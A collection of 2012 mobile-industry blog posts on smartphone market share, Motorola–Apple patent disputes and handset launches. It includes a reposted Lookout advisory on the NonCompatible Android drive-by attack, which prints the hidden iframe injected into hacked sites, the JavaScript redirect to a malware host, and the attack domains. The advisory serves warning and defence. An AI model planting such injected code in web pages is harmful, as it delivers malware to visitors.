Samsung may be reaping the rewards from its multiple Galaxy product ranges, but Apple is showing that the world can be dominated with just a few products. Latest research from Gartner shows that Apple has gained 7.9% market share of the entire global phone sales market, despite only have three iPhones on sale. The research firmly pegs Apple in third place behind Nokia and Samsung.

Total sales of mobile phones are down on last year, but smartphones continue to rise as more people choose smartphones over featurephones. Gartner also warns that whilst Apple’s iOS (and Windows Phone) offer different experiences, devices running on the Android platform would struggle to differentiate going forward with the main differential being price, especially in the mid-range.

“This is particularly true for smartphones based on the Android OS, where a strong commoditization trend is at work and most players are finding it hard to break the mould.”

Traditionally Google has only launched one Nexus branded handset per year, following the lead of Apple, but that could be set to change according to the Wall Street Journal. WSJ report that Google is planning a much bigger roll out of Nexus branded handsets this year with up to 5 manufacturers, including Motorola who are being purchased by Google, all launching Nexus branded stock Android smartphones.

Why is Google planning this? To ease growing unrest over the company’s planned acquisition of Motorola which Google partners believe could give the company unfair favouritism. Google is also hoping that the launch of a range of Nexus branded stock Android devices would mean that the hardware OEMs differentiate against each other based purely on hardware, and not the current hardware/UI differentiation status quo.

Google is also hoping that offering multiple manufacturers early access to the latest Android build will represent faster updates for non-Nexus devices and the WSJ also comments that Google could look to enforce the pure Android platform on all Android devices as the use of custom UIs often leads to slower updates and a poorer experience.

Google’s plan of attack isn’t exclusive to mobile smartphones either as the company could use the same concept to relaunch Android tablets. The new Nexus branded handsets would be sold directly through Google’s online store, network-free, unlocked and at a full price.

Latest research from market research firm Nielsen has shown that more than half (50.4%) of US mobile subscribers now own a smartphone, following an increase from December 2011 (47.8%).

Smartphone penetration continued to dominate the key US market, with Apple being called the top manufacturer whilst Android was touted as the top platform. Nokia’s Lumia 900, released in the US last month, has continued to do well and capture consumers’ imagination, whilst the Windows Phone platform only captured 1.7% market share in Q1 2012 (even Windows Mobile, the older version of the platform, had a higher market share at 4.1%).

During Q1 2012, 48% of smartphones ran Android, whilst iOS captured 32% market share and RIM’s fledgling BlackBerry platform came in at a healthy 11.6% market share.

The Android phone is under attack by a new form of hacking attempt. Please read the full information below and be wary of installing any unofficial products or apps.

Security Alert: Hacked Websites Serve Suspicious Android Apps (NonCompatible)

Hacked websites are frequently used to infect PCs with malware; however, today we have identified the first time hacked websites are being used to specifically target mobile devices. Lookout is in the process of rolling out an update to protect against the new threat, NonCompatible.

How it Works

In this specific attack (called NonCompatible), if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app. In order to actually install the app to your phone, you must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”). If the device does not have the unknown sources setting enabled, they will not be affected by the application; however, if a user does have the unknown sources setting enabled, installing the app will result in their device becoming infected.

Technical details

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info. Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page). When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it.

Technical Summary

Suspicious applications are currently served from the following sites:

· gaoanalitics.info

· androidonlinefix.info

Command and Control (C&C) domains include:

· notcompatibleapp.eu

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous. As Lookout identifies the extent of infected websites, we will update this blog post.

The Lookout security team is actively investigating the infected websites and suspicious application.

Motorola Mobility has just announced the company’s first quarter 2012 financial results and things are looking quite bleak for the company.

Motorola Mobility, who are in the process of being acquired by Google, generated revenues totalling $3.1 billion, with a net operating loss of $85 million, which is a $24 million increase on the same quarter last year. Total shipments equalled 8.9 million, including 5.1 million smartphones but the figures conveniently don’t convey total sales figures.

Google paid $12.5 billion for Motorola Mobility and although not complete, if the company continue to haemorrhage money, parts of Motorola Mobility could be sold off by Google, signalling the end of one of the longest running technology companies and former kings of the mobile world.

The writing has been on the wall for quite some time but it’s finally happened; Samsung has overtaken Nokia to become the number 1 manufacturer in terms of global mobile handset sales.

The news comes via Strategy Analytics, who quote Samsung’s overall sales in Q1 2012 as 93 million versus Nokia who they say sold only 83 million.

In comparison to Samsung and Nokia, Apple only sold 35.1 million devices in the quarter, as they revealed. Samsung’s market share sits at 25.4%, Nokia’s at 22.5% and Apple’s at 9.5% with 42.6% market share made up by all the other players in the industry.

Nokia has held the top spot since the days it surpassed Motorola back in 1998, but a combination of design, power and unbelievable marketing and consumer interest has meant that Samsung’s Galaxy smartphones range has become the choice of many people.

Samsung’s net profit in the quarter was 5.05tn won ($4.5bn; £2.8bn) which is an 81% increase versus the same quarter last year and Robert Yi, Head of Investor Relations for Samsung said:

“We cautiously expect our earnings momentum to continue going forward, as competitiveness in our major businesses is enhanced.”

Samsung’s next Galaxy smartphone is set to launch on May 3rd and we’ll be bringing you all the news of that as soon as it launches so stay tuned!

The court case between Apple and Motorola continues with the latest instalment from court.

In between creating and filing new patents, Apple appears to tread on the patents of others. An earlier court case in its patent war with Motorola Mobility Holdings Inc (MMI), meant Apple’s push email was banned in Germany. Today a regional court has upheld the ban and therefore the ban remains in force.

There will be no push email in Germany and customers have to rely on manually checking their email.

Apple will now be expected to come to some agreement with Motorola Mobility though no specified damages have as yet been suggested.

Apple will want to get its customers and one of its most popular services back on track as soon as possible.

It is unknown whether Motorola’s patents extend to other countries and whether Apple could see its services halted elsewhere.

Ultra-stylish, ultra-vogue smartphone from Motorola Mobility just got cooler with an ice white version available at Tesco online and in-store from today

LONDON – April 11, 2012 – Calling all British style gurus! Get ready for even more choice when it comes to flaunting your fashion flair with the arrival of an ice white version of the ultra-vogue, rail-thin MOTOLUXE™ from Motorola Mobility UK Limited. The smartphone that combines brain and beauty is available in Tesco Phone Shops and online through Tesco Direct in the UK from today priced free from £20 a month on Tesco Mobile.

When it comes to panache, this Android™ 2.3 powered smartphone sets the bar high. With a 4-inch touchscreen that’s perfect for writing emails, surfing the Web and watching movies, you’ll always be connected, clued-up and entertained – whether at work, hanging out with friends or out on the town.

For photo buffs, an 8-megapixel autofocus camera with flash lets you shoot like a pro. You can even instantly share the pics with friends and family using the phone’s pre-loaded social networking apps.

But there is a reason this is called a smartphone! Incorporating Motorola’s MotoSwitch user interface, the MOTOLUXE learns who you talk to and which apps you use the most, and puts all that information front and center.

The Social Graph feature gives you easy and fast access to the people who really matter. It learns who’s most important to you and uses that information to populate the home screen. The more frequently you communicate with someone, the bigger their icon becomes. The Activity Graph focuses on your app habits; automatically changing to reflect the apps you use the most to provide customised menus.

With Music Now you can now play your favorite music while the Smart Gallery feature displays your favorite pictures as collections.

When you’re on the go, MOTOLUXE’s GPS technology will point you in the right direction and make sure you get to where the action is. If that isn’t enough, the phone is Bluetooth®1-enabled, as well as your portal into Google Play™ – where you’ll find thousands of games, apps, music, books and movies.

MOTOLUXE also sets itself apart with a lanyard slot that lights up, so you can see when you’ve missed a call, text or even check battery charge at a glance.

“We are dedicated to offering great value and choice to our customers and we see the MOTOLUXE as one of the must have handsets of the summer,” said Tesco Mobile spokesperson. “The combination of the sleek and stylish MOTOLUXE and a choice of great value Tesco Mobile tariffs ensures this smartphone will be sure to turn heads both online and in-store.”

“The new MOTOLUXE in white offers even more choice to UK fashionistas when it comes to smartphones that combine sleek style and high-end features that won’t break the bank,” said Victoria McManus, UK & Nordics marketing director, Motorola Mobility. “Not only does this smartphone have a big screen and the latest, greatest entertainment tools, it’s affordable and combined with Tesco Mobile you’ll be sure to have plenty left over to take your brand new smartphone out and show it off.”

The US' "Big Four" carriers announce plans to introduce a collective database of stolen phones to prevent their use in the US, similar to the UK's current database.

The big four network carriers in the US, Verizon, AT&T, Sprint and T-Mobile, have today announced plans to introduce a database containing the IMEI (identification) numbers of stolen mobile devices.

One of the biggest problems that affects mobile users worldwide is stolen phones, of which there are growing numbers, and the use of them afterwards. The UK operates a national crime database which disables the use of any handset listed as stolen (or lost even) on any UK network. However, these devices work freely outside the UK.

With the US’s top four carriers catering for around 90% of mobile device usage in the US, the idea of a combined database makes perfect sense and should prohibit the use of those devices on any of the four carriers. The combined database should launch within six months and there are plans to make this into a national database within 18 months, disabling the use of any of those devices on any US network. The plans are being backed by CTIA.

There are four voluntary industry commitments in place in the US, which address the issue of stolen devices:

Implement databases to prevent reactivation of stolen smartphones.

(A) Notify consumers of features to secure/lock smartphones with passwords.
(B) Educate consumers about features to secure/lock smartphones with passwords.

Educate consumers about applications to remotely lock/locate/erase data from smartphones.

Educate consumers about smartphone theft, protections and preventative measures.

The plans are sure to be a great deterrent against mobile phone theft and this could eventually lead to cross-Atlantic (or even global) co-operation to prevent the use of stolen smartphones around the world.

More on this when we get it.

Motorola has introduced their iPhone competitor the Motrola RAZR MAXX. Already on sale in America the RAZR MAXX will cross over to Europe this May.

The new RAZR MAXX features a 4.3 inch Super-AMOLED display and arrive in a Kevlar outer body. The battery is said to be the best of any smartphone. The 3300 mAh battery will provide 17.6 hours of video playback.

At just 8.99mm thick Motorola has managed to keep down the confines of the body and add a dual-core 1.2GHz processor with 1GB of RAM and to top it of, the RAZR MAXX will come with an 8 megapixel sensor.

There is no news as yet to the operating system nor a definitive price point. News is that the timing of the RAZR MAXX may be set to coincide with the arrival of Apple’s, iPhone 5, later this summer.

The Motorola Defy is now available for sale in the UK. The Defy is a little late in its arrival, originally scheduled for last month. It is the baby brother of the Defy+ and arrives with all the sturdiness and ruggedness expected of a Motorola product named Defy.

The Defy Mini arrives with a 3.2-inch touchscreen, a 3-megapixel camera and a 1,650 mAh battery. The Motorola Defy Mini will come pre-installed with Android 2.3 Gingerbread.

The Defy Mini is available from Clove for just £162 inclusive of VAT. So if you are into extreme sports or you make a habit of dropping or mistreating the phone or your job involves a lot of precarious conditions for your phone, then the Defy could be the smartphone for you.

I’m not going to lie, Google’s rebranding of the Android Market to the Google Play Store really does seem pointless but you can see why Google has done it.

Some users have found out that apps, that they hard forked out their hard earned money for in the Android Market, had gone missing when Google rebranded the market. The same users were getting errors when trying to access the app directly.

Rest assured, Google is looking into the matter having added it to their Known Issues pages. We’ve not had the bug ourselves but it’s definitely an issue if it affects you. Hopefully Google will roll out a fix very soon.

Clove are selling the device for £382.80 inclusive of VAT and are giving away a pair of free folding speakers, which have a £20 value.

The White variant of the Motorola RAZR is the same spec as the original Motorola RAZR, except of course it’s white.

Apps make a platform, and the availability of apps is what consumers often look at when choosing their next device. Part of today’s smartphone ecosystems are engaging with and keeping developers on board.

Appcelerator and market research firm IDC announced the results of a joint survey of 2,173 global app developers. The report reveals that 89% of developers who responded were interested in developing for the iPhone, whilst 88% said they were interested in Apple’s iPad, which is no surprise given its ever increasing success.

Developers are also losing interest in the Android operating system “due to continued fragmentation of the platform” with interest dropping to 78.6% for Android smartphones and 65.9% for Android tablets.

Windows Phone retains a strong appeal amongst the developer community, being classified as the “number three OS in terms of priorities” whilst interest in the BlackBerry platform continued to decline, dropping 5.2% from Q4 2011 (20.7%) to Q1 2012 (15.5%).

Appcelerator / IDC Mobile Report Reveals Google Strongly Positioned to Battle Facebook in Social Mobile

Survey Shows Google’s Assets as Key Differentiator in Platform War with Facebook; Android Interest Erodes as HTML5 Becomes a Must-Have for Mobile Apps

Mountain View, CA and Framingham, MA (PRWEB) March 20, 2012

Appcelerator®, the leading mobile platform company, and industry leading analyst firm International Data Corporation (IDC), today announced results from a new joint survey of 2,173 Appcelerator developers around the world. Findings reveal developers’ accelerating interest in social mobile capabilities, and – notwithstanding Facebook’s 900 million users – developers view Google and its broad range of assets (i.e., Google+, search, Gmail, Android, Android Market, etc.) as key to implementing their social strategies in 2012. The report also shows that Android – once neck-and-neck with iOS – is seeing waning interest due to continued fragmentation of the platform, and that HTML5 will play a bigger role in the mobile app development space this year.

Appcelerator and IDC also continued to observe a maturation of mobile strategies, as companies move from Exploration towards Acceleration and Innovation in their mobile initiatives. The full report is available free for download at http://bit.ly/q1-2012-report.

The Google & Facebook Battle Moves to Mobile
Developers clearly see the worlds of mobile and social coming together as a huge opportunity, but they are struggling to understand how to leverage social assets in their mobile apps, including Facebook’s social graph. At the same time, they recognize immediate value in having easy integration capabilities represented in Google’s combined network effects with Google search, YouTube, Gmail, Google Maps, etc. In fact, 39% of developers say that the network effects of Google’s broad range of assets are more important to their social strategies in 2012 than Facebook’s social graph.

“This translates into a big competitive opportunity for Google—and potential significant risk for Facebook—especially because developers perceive Google as innovating faster than Facebook,” said Scott Ellison, VP Mobile & Connected Consumer Platforms at IDC. “Add to that, Google itself is clearly gearing up to leverage its network effects, one example being the alteration of its privacy policies to allow sharing of user data across its services.”

For all of the excitement and opportunities that social networking creates within the mobile ecosystem, this survey revealed developers don’t feel they have the knowledge or tools to fully leverage social in their app strategies. There are opportunities for established players like Facebook, LinkedIn, and RenRen, as well as for challengers like Google and even Apple, to engage, educate and provide tools to help contribute to developers’ success, and drive engagement with their platforms.

The Rise of HTML5 & Windows 7, iOS Dominance and Slow Android Erosion
The mobile app space to date has been dominated by native apps. However in 2012, HTML5 will move to center stage with both pure mobile browser apps and “hybrid apps,” which integrate both native code and substantial amounts of HTML5. This approach will help developers innovate across a crowded mobile landscape that has seen iOS, Android, and Windows 7 claim the top 3 spots, while RIM and others have experienced significant declines. While Android has seen enormous growth in shipments and remains a solid #2, fragmentation continues to take its toll.

Below are the top findings from this quarter’s report:

HTML5 becomes important to many mobile developer strategies. A resounding 79% of mobile developers report that they will integrate HTML5 in their apps in 2012. This is much higher than many industry observers had anticipated as late as Q4 2011.
Developers are struggling to understand and leverage Facebook’s social graph. Leveraging the full social graph itself ranked low – tied for 8th out of 11 social priorities for developers, while developers’ top uses of social remain notifications, status updates and authentication.
Google’s network effects of its vast assets are a key strategic differentiator against Facebook. Google’s footprint across its assets (search, advertising, YouTube, Gmail, Android, Maps, etc.) and its resultant network effect is indexing higher than expected, given the size of Facebook’s massive lead in social.
Mobile app development continues to Accelerate in 2012. More than half (53.5%) of respondents report that they are now focused on Accelerating their mobile strategies compared to 27.4% in 2010, and 16.9% of respondents report that they will be focused on Innovating their mobile apps in 2012 compared to 9.2% in 2010.
Windows Phone 7 interest remains high. WP7 is the clear “number three” OS in terms of priorities, after Apple’s iOS and Google’s Android. The huge jump in interest in Q4 2011 is holding steady notwithstanding somewhat disappointing WP7 device sales to date.
This quarter saw another sharp drop in developer interest in BlackBerry OS. Developer interest declined from 20.7% in Q4 2011 to 15.5% in Q1 2012, set against negative news around RIM’s challenges.
iOS continues to reign at number one in developer interest levels. Eighty-nine percent (89%) of respondents say they are very interested in developing for the iPhone, followed by the iPad at 88%.
Android phones and tablets are showing slow erosion of interest levels. This quarter, interest in Android phones dropped 4.7% points to 78.6%, and Android tablets dropped 2.2% points to 65.9% from the previous survey. Although close to or within the margins of error, these drops are consistent with the trend of small but steady erosion in Android interest over the last four quarters, even as enormous growth in Android unit shipments continues.
Location and notifications are the top two cloud services developers plan to use to help scale. Location and notifications are the top two services that developers plan to integrate into their applications to help scale up their mobile initiatives in 2012.
From Exploration to Acceleration and Innovation
Developers continue to move toward a maturation of their mobile strategies: to Acceleration and Innovation and away from initial app market Exploration. A majority of respondents believe they are clearly in the Acceleration phase now, with the expectation that they will be building multiple applications on a number of different operating systems.

Throughout the survey, messages of a gradually maturing market permeate. Growth in the number of developers building mobile applications, growth in the number of operation systems and applications supported, growth in the size of companies that are building mobile applications as well as increasing numbers of hybrid teams (both internal application development teams combined with external application development teams) are all evidence of this maturity. This quarter’s survey underscores that 2012 will mark key shifts in platform strategies, how social will be leveraged, and how fast these changes will emerge in the marketplace.

Earlier this month, a court judge granted provisional approval to Apple in their request for documents from Motorola concerning the development of Android.

As part of the ongoing patent lawsuits between the two companies, Motorola was initially given a March 5th deadline to produce the documents for Apple, with Cupertino-based Apple then filing a complaint on March 16th after the documents weren’t received.

Motorola claimed that Apple’s request wasn’t specific enough and successfully managed to get the initial decision overturned.

“The motion is vague and overbroad and Motorola’s objections are persuasive,” said Judge Posner in his decision yesterday. “If Apple desires a further court order compelling production of data within the scope of the March 5 order, it will have to narrow its request to a manageable and particularized set of documents.”

The Motorola RAZR has received an update. The update available to owners in the UK, Italy, France and Spain is more of a tweak then an update similar to the likes of Ice Cream Sandwich.

The new build takes the RAZR’s Android from 2.3 to Android 2.3.6. Improvements to smartphone include Smart Actions including VIP Caller Mode and Auto Text SMS and includes improvements to the battery life and camera performance.

Unfortunately this is not the Android 4.0 update that users are expecting though that is due to arrive sometime in Q2 this year.

Motorola bought back the iconic RAZR late last year and instead of bringing back the flip design, Motorola took the design one step further and kept the sleek look in an extremely small package.

Gone is Motorola’s own UI from old days, instead in comes the Android 2.3.5 Gingerbread OS with 16GB storage, 1GB RAM and an 8 megapixel shooter with 1080p HD video capture @30 frames per second. Powered by a dual-core 1.2 GHz Cortex-A9 processor, the RAZR features a 4.3 inch Super AMOLED display capable of sporting 540 x 960 pixels. Simply one of the best features of the RAZR is its super thin 7.1mm profile thickness.

We went up close and personal with the RAZR recently and here’s our hands on gallery:

Last week at Mobile World Congress, we went hands on with Motorola’s new durable Motorola Defy Plus, which boasts industry standard levels of waterproofing and dustproofing.

Alongside its durable qualities, the Defy Plus features a Corning Gorilla Glass display, 3MP fixed focus camera, 600MHz processor and the Android 2.3 Gingerbread platform.

ps Apologies for the error in the specs. The Motorola Defy has a 5 megapixel camera and a 1GHz CPU, I think Nirave must have been a little tired when he wrote this. Many thanks for the feedback below alerting us of the errors.

Here’s our hands on with the rugged little monster:

The slow release of updates to Android devices of Ice Cream Sandwich has been frustrating for consumers and the networks have been lacking with information on news of its appearance.

Today, Verizon led the pack by publishing a list of smartphones that will be getting the updates. Unfortunately, no timetable has been structured but at least if you are an owner of once of these devices you can rest a little easier knowing your position.

Verizon’s list reads:

HTC: Thunderbolt, Droid Incredible 2, Rhyme, Rezound

Motorola: Xoom, Bionic, RAZR, RAZR Maxx, Droid 4, Xyboard 8.2, Xyboard 10.1

Samsung: Galaxy Tab 10.1, Galaxy Tab 7.7

LG: Spectrum

We will keep you up to date on this information as soon as we are able.

Apple’s latest patent war with Motorola Holdings Inc forced a removal of their iPad and iPhones from their online store in Germany.

Apple won a successful appeal that means its products are back on the online shelves and available for sale.

The win for Apple means Motorola cannot enforce the original ruling with Apple revising license-agreement terms offered to Motorola. The court also confirmed that if Motorola insisted on the sales ban, it would be in violation of its legal duties:

At the current state of the proceedings, it is to be assumed that Motorola Mobility would violate its duties under antitrust rules if it continues to ask Apple to stop the sales.

This patent war is centred on a standard essential patent which Motorola is required to license to competitors..

Motorola and Apple are in the courts with Motorola Mobility Holdings Inc winning today’s landmark injunction. Apple and Motorola have several ongoing court courses with rows over patents and technology. Google, the mother company for Motorola has acquired some valuable patents from the purchase of Motorola and it aims to put this acquisition to good use. The court win for Motorola forces apple to de-activate the “push” facility for its mobile users of iCloud and MobileMe services in Germany. The service is only affected on the iPhone, iPod and iPads. Apple claims the patent is invalid and is appealing the court decision.

Phones4u have made the White Motorola RAZR available to pre-order with the device becoming available from March 1st.

The device will be sold free on contracts starting at £21.50 per month, which is a great price given the RAZR’s impressive specs list. A dual-core 1.2GHz processor alongside a 4.3 inch Super AMOLED Gorilla Glass display and Android 2.3.5 make the RAZR an attractive proposition for the low monthly price.

The RAZR will also ship with Motorola MotoCast, which allows users to stream/download content from a remote computer straight to the device.

Phones4u are also offering early adopters who buy the RAZR the opportunity to win two tickets to the snowbombing festival held in Austria on April 9-14.

Full press release below.

LONDON – Feb. 23, 2012 – More seductive than ever, the astonishing Motorola RAZR™ from Motorola Mobility UK Limited just got cooler with the availability of a pristine white version at Phones 4u. This impossibly thin and lightweight smartphone is distinguished by its unique design, and now offers two classic colour choices – original black or pristine white.

Motorola RAZR in white is available starting today for pre-order, both online and in-store, from free from £21.50 a month on contract. All customers who pre-order or purchase the Motorola RAZR in either black or white before 25th March, 2012, will be entered into a prize draw to win 2 tickets to Snowbombing, the greatest show on snow, taking place in Mayrhofen, Austria (April 9-14).

“We are delighted to be the first UK retailer to stock Motorola RAZR in white, offering our customers even more choice when it comes to this iconic handset. Customers have often had to make a choice between fashion and function, however this feature-packed smartphone delivers the best of both worlds,” said Scott Hooton, Phones 4u Chief Commercial Officer. “We’re confident that the white edition and the fantastic Snowbombing promotion that kicks off today will be a huge hit with our customers.”

Motorola RAZR boasts a gorgeous sculpted, glass screen, diamond-cut aluminum accents, and a hyper-vibrant 4.3-inch Super AMOLED Advanced display for incredible vivid images. It also sports KEVLAR® fiber (yes, that KEVLAR) and Corning® Gorilla® Glass to help the screen stand up to scratches and scrapes. And every part of the Motorola RAZR is protected by a splash-guard coating, which even extends to the electrical boards inside.

“Since we re-imagined the iconic RAZR brand, the new Motorola RAZR has wowed consumers across the globe with its beauty inside and out,” said said Victoria McManus, UK marketing director, Motorola Mobility. “Brits are renowned for their style, sophistication and love of cutting-edge technology, so the new white Motorola RAZR will surely stand out from the smartphone crowd, whether it’s destined for the runway or the boardroom.”

Motorola RAZR is beautiful on the inside too, with 1GB of RAM and a dual-core 1.2GHz processor and Android™ 2.3.5, enabling a lightning-fast user interface and the power to multi-task like never before.

Mobile companies using celebrities to promote devices is nothing new and Motorola has followed in the footsteps of many of its competitors by launching a new exclusive model, for select Academy Award presenters and nominees.

The Droid RAZR MAXX comes in an exclusive red colour and comes bundled with a Motorola ELIT SLIVER Bluetooth headset and a gold pouch for female recipients or a top-end shaving kit for gents.

Motorola will not be releasing the device to the public and only five of the exclusive devices will be made, so naturally we can expect to see them on eBay or Craigslist soon enough!

Microsoft has joined Apple in filing a complaint with the European Commission about Motorola’s stance over Wi-Fi and H.264 video patents. The companies argue that Motorola is demanding excessive royalties and trying to stop sales that rely on those standards. The companies argue that Google as the new owner of Motorola should reign in its new sibling. Motorola is demanding Microsoft pay a 2.25 percent royalty on products that use H.264, $22.50 on a $1,000 laptop with this sum doubling for a $2,000 laptop. The ongoing court battles over patents is increasing between Motorola v Apple and now Microsoft v Motorola. No one yet knows where it will end but it is hoped that the disturbance does not lead to the killing of video on the web as per Microsoft’s please with their latest blog post.

Google as the owner of Motorola acquired some very important patents. However, some of these included use of these patent as an industry standard to be offered in a fair, reasonable and non-discriminatory way. Google, may find that the ugly eye of the European Commission may now intercede in these disputes.

Motorola has established its newest smartphone suitable for UK fashionistas, ultra-stylish and ultra-vogue. Motorola Mobility’s MOTOLUXE smartphone announced in early February is now available for purchase on pay as you go. The MOTOLUXE features a 4-inch edge-to-edge FWVGA display and a 3-megapixel camera. Targeted at the ’British’ the smartphone will feature android 2.3 Gingerbread and Motorola’s MotoSwitchUI.

The MOTOLUXE is available from Clove £234 and Unlocked Mobile £224.98

The press release reads as follows:

Calling all British style gurus! Get ready to flaunt your fashion flair with the ultra-vogue, rail-thin MOTOLUXE™ from Motorola Mobility UK Limited, expected to be available late February.

If that isn’t enough, the phone is Bluetooth®1-enabled, as well as your portal into the Android Market™ where you’ll find thousands of games, apps, music, books and movies.

MOTOLUXE also sets itself apart with a lanyard slot that lights up. So you can see when you’ve missed a call, received a text or have an email waiting for you.

“By combining sleek style with Android brains, MOTOLUXE is ideal for people who want the latest technology in a sophisticated package,” said Marcus Frost, senior marketing director, Europe, Motorola Mobility. “Not only does this smartphone have a big screen and the latest, greatest entertainment tools, it’s affordable and won’t take a bite out of your budget.”

Apple has secured yet another victory in its ongoing patent disputes, the latest surrounding the Slide-to-Unlock patent granted back in December.

The latest victory finds Motorola is violation of the patent and means that Motorola’s planned use of a future similar unlock method is no more.

A Motorola spokesperson said: ‘Motorola has implemented a new design for the feature. Therefore, we expect no impact on current supply or future sales.’

Patent analyst Florian Mueller told the BBC:

‘After Google closes the acquisition of Motorola Mobility, the Apple-Motorola Mobility dispute will soon gain importance transcending that of the global battle with Samsung…Apple is already asserting the slide-to-unlock patent in different jurisdictions against all three leading Android device makers and might use it against even more of them going forward.’

The move will be unwelcome news to Google, who earlier this week gained approval for their takeover of Motorold Mobility to $12.5 billion. The victory is yet another for Apple, who have on going patent disputes with a range of manufacturers, designers, componentmarkers and other OEMs.

Dressed in a suit that you could mistaken for the Galaxy Nexus or Nexus S, this is the image of the rumoured Motorola Atrix 3. The Atrix 3 will supposedly arrive with a quad-core nVidia Tegra 3 SoC with Android 4.x Ice Cream Sandwich. The Atrix 3 travels with a 4.3-inch HD display and a staggering 3,300mAh battery (the jury is out on whether the battery is remotely possible when size is a huge consideration of smartphones). Ten megapixel camera with 2GB of RAM are to complete the Atrix 3 project. The Mobile World Congress is but a few weeks away and the industry waits with anxiety to see if this super-mobile smartphone is announced at the Barcelona event.

Smartphones sales overtook PC sales in 2011, after sales of the small devices grew 62% last year.

A whopping 488 million smartphones devices were shipped last year compared to 415 million units of Desktops, Laptops, Netbook, Ultrabooks and Tablets. The report and figures show the increasing use of smartphones as replacements for the larger devices, and the increasing capabilities of smartphones mean they have more capability than a lot of traditional PCs.

Chris Jones, Vice President at Canalys and Principal Analyst said:

“Smart phone shipments overtaking those of client PCs should be seen as a significant milestone. In the space of a few years, smart phones have grown from being a niche product segment at the high-end of the mobile phone market to becoming a truly mass-market proposition. The greater availability of smart phones at lower price points has helped tremendously, but there has been a driving trend of increasing consumer appetite for Internet browsing, content consumption and engaging with apps and services on mobile devices.”

Canalys also say that Android boasts the majority of smartphone shipments, with 237 million devices shipped whilst iOS leads the closed-OS pack with 93 million units shipped.

Windows Phone shipments totalled 2.5 million last year according to the company, one million of were Nokia Lumia 800 devices following the company’s partnership with Microsoft.

An interesting point is that Canalys note that RIM’s BlackBerry platform and the Windows Phone OS both shrunk their market share in Q4 2011 versus the previous year and iOS growth was only slightly less than Android growth in the same period.

The trend looks set to continue further, with higher-spec devices set for launch this year, and new super smartphones also expected to launch this year.

A morning ban of iPad and iPhone sales in Germany has been overturned in Apple’s favour. Motorola had enforced a patent ruling delivered in December forcing Apple to remove iPad and iPhone models from online stores.

A statement from Apple said: “All iPad and iPhone models will be back on sale through Apple’s online store in Germany shortly. Apple appealed this ruling because Motorola repeatedly refuses to license this patent to Apple on reasonable terms, despite having declared it an industry standard patent seven years ago.”

A spokesman for Motorola was unable to comment on the case.

Patent consultant Florian Mueller who attended the Mannheim District court review told the BBC it was not yet clear exactly why the sales ban had been lifted.

“A very plausible explanation would be that Apple made a new offer to Motorola to license its standard essential patents – the new offer was certainly discussed in court this afternoon. The appeals court may have felt that meant that the suspension should be lifted.”

I am not sure how Motorola must feel at this moment. An early element of glee at Apple having to remove the offended items only for them to be back on the shelf in a matter of hours. I am no patent expert but in cases like this surely it would be easier for both sides to have settled the matter outside the court.

Apple has, not just enough money, but more than enough cash to buy all seven companies and still be left with loose change. As of November 2011 – the total of cost of Samsung, HTC, Nokia, LG, Motorola, Sony and RIM were valued at $78 billion. Apple has a cash reserve of $97.6 billion. Now that is a record to be proud of.

Remember the Motorola RAZR? The lovely thin smartphone that was the “cool” phone to have back in the day? Back in October last year, Motorola resurrected the design but with modern-day specs.

The RAZR features a 1.2GHz dual-core processor, 1GB RAM, 1780mAh battery, 4.3-inch qHD SuperAMOLED display and 16GB internal memory alongside the included 16GB microSD card.

The super thin smartphone became available to buy in white from the USA last month, but now online retailer Clove Technology have put the device up for pre-order in the UK.

Clove are planning to ship the device sometime next month, for £359 + VAT (around $560) sim-free and unlocked. Clove are also including MOTOROKR EQ3 speakers in pre-orders.

Update: It was there but it’s been taken down. It may have been put up in error by Clove, but it’s unclear.

EU regulators set a deadline of February 13th for a decision to be reached on Google’s acquisition of Motorola Mobile after Google came forward with previously-unseen documents to support the acquisition.

The announcement came via the EU Commission, after the EU executive suspended the previous deadline of January 10th whilst waiting for documents to be bought forward by Google.

U.S. antitrust regulator are also assessing the deal, which would see the world’s number one Internet search engine acquire Motorola’s handset division and Motorola’s mobile technology patents.

Google and other Android manufacturers have been subject to several patent cases against the likes of Nokia, Apple and Microsoft, and Motorola’s patents would help bolster Google’s fight against the competition.

Motorola Mobility has been found guilty of infringing a Microsoft patent. The ruling was given by a U.S. trade panel judge and centres around the manufacture of Motorola’s Android smartphones.

The patent applies to the ability to schedule meetings using mobile devices. When the patent was filed in October last year, Microsoft claimed a total of nice patents had been violated, with two dropped during litigation leaving the seven that were ruled on.

The judge found that whilst Motorola did infringe one of patents, there was no violation in the six other patents.

Scott Offer, general counsel of Motorola Mobility, said in a statement:

“We are very pleased that the majority of the rulings were favorable to Motorola Mobility. The initial determination may provide clarity on the definition of the Microsoft… patent for which a violation was found and will help us avoid infringement of this patent in the U.S. market.”

David Howard, Microsoft’s deputy general counsel, also welcomed the decision, saying:

“We are pleased with the ITC’s initial determination finding Motorola violated four claims of a Microsoft patent.”
